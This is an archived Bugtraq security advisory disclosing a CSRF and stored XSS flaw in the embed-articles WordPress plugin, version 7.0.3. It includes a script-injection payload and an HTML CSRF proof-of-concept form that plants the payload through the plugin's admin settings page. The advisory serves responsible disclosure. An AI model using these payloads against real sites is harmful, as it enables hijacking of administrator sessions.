lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Thu, 7 May 2015 18:59:57 GMT
From: kingkaustubh@...com
To: bugtraq@...urityfocus.com
Subject: CSRF/XSS in embed-articles Wordpress Plugin

======================================================
CSRF/Stored XSS Vulnerability in embed articles Plugin
======================================================


. contents:: Table Of Content

Overview
========

* Title :CSRF and Stored XSS Vulnerability in embed-articles Wordpress Plugin 
* Author: Kaustubh G. Padwad
* Plugin Homepage: https://wordpress.org/plugins/embed-articles/
* Severity: HIGH
* Version Affected: Version 7.0.3 and mostly prior to it
* Version Tested : Version 7.0.3
* version patched:

Description 
===========

Vulnerable Parameter 
--------------------

* API Key

About Vulnerability
-------------------
This plugin is vulnerable to a combination of CSRF/XSS attack meaning that if an admin user can be tricked to visit a crafted URL created by attacker (via spear phishing/social engineering), the attacker can insert arbitrary script into admin page. Once exploited, adminā??s browser can be made to do almost anything the admin user could typically do by hijacking admin's cookies etc.

Vulnerability Class
=================== 
Cross Site Request Forgery (https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29)
Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS)

Steps to Reproduce: (POC)
=========================

After installing the plugin

1. Goto settings -> Embed Articles

2. Insert this payload ## "> http://www.<script>alert(1)</script .com ## Into  above mention Vulnerable parameter Save settings and see XSS in action

3. Visit embed-articles settings page of this plugin anytime later and you can see the script executing as it is stored.

Plugin does not uses any nonces and hence, the same settings can be changed using CSRF attack and the PoC code for the same is below

CSRF POC Code
=============
<html>
  <body>
    <form action="http://127.0.0.1/wp/wp-admin/admin.php?page=embedarticles&lock=no" method="POST">
      <input type="hidden" name="embedarticles&#95;hidden" value="Y" />
      <input type="hidden" name="pub&#95;value" value="&quot;&gt;&#32;&quot;&gt;&#32;http&#58;&#47;&#47;www&#46;&lt;script&gt;alert&#40;1&#41;&lt;&#47;script&#32;&#46;com" />
      <input type="hidden" name="display" value="bottom" />
      <input type="hidden" name="Submit" value="Update&#32;Options" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


Mitigation 
==========
Plugin Closed

Change Log
==========
Plugin Closed

Disclosure 
==========
07-April-2015 Reported to Developer
Plugin Closed
8-May-2015 Public Disclosed
credits
=======
* Kaustubh Padwad 
* Information Security Researcher
* kingkaustubh (at) me (dot) com [email concealed] 
* https://twitter.com/s3curityb3ast
* http://breakthesec.com
* https://www.linkedin.com/in/kaustubhpadwad

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ